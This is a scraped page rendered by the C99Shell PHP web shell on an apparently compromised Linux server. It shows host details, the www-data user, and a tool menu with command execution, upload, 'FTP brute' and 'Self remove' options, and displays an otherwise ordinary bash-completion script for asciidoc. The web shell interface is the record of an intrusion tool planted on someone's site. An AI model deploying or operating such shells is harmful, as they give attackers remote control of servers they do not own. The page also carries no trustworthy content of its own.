!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/snap/core20/2585/usr/share/bash-completion/completions/   drwxr-xr-x
Free 0 B of 59.63 MB (0%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     asciidoc.py (1.16 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
# asciidoc(1) completion                                   -*- shell-script -*-

_asciidoc_doctype()
{
    COMPREPLY+=( $(compgen -W 'article book manpage' -- "$cur") )
}

_asciidoc()
{
    local cur prev words cword split
    _init_completion -s || return

    case $prev in
        --attribute|-!(-*)a)
            return
            ;;
        --backend|-!(-*)b)
            COMPREPLY=( $(compgen -W 'docbook html4 xhtml11' -- "$cur") )
            return
            ;;
        --conf-file|-!(-*)f)
            _filedir conf
            return
            ;;
        --doctype|-!(-*)d)
            _asciidoc_doctype
            return
            ;;
        --help|-!(-*)h)
            COMPREPLY=( $(compgen -W 'manpage syntax topics' -- "$cur") )
            return
            ;;
        --out-file|-!(-*)o)
            _filedir
            return
            ;;
    esac

    $split && return

    if [[ $cur == -* ]]; then
        COMPREPLY=( $(compgen -W '$(_parse_help "$1" "--help manpage")' \
            -- "$cur") )
        [[ $COMPREPLY == *= ]] && compopt -o nospace
        return
    fi

    _filedir
} &&
complete -F _asciidoc asciidoc asciidoc.py

# ex: filetype=sh

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0046 ]--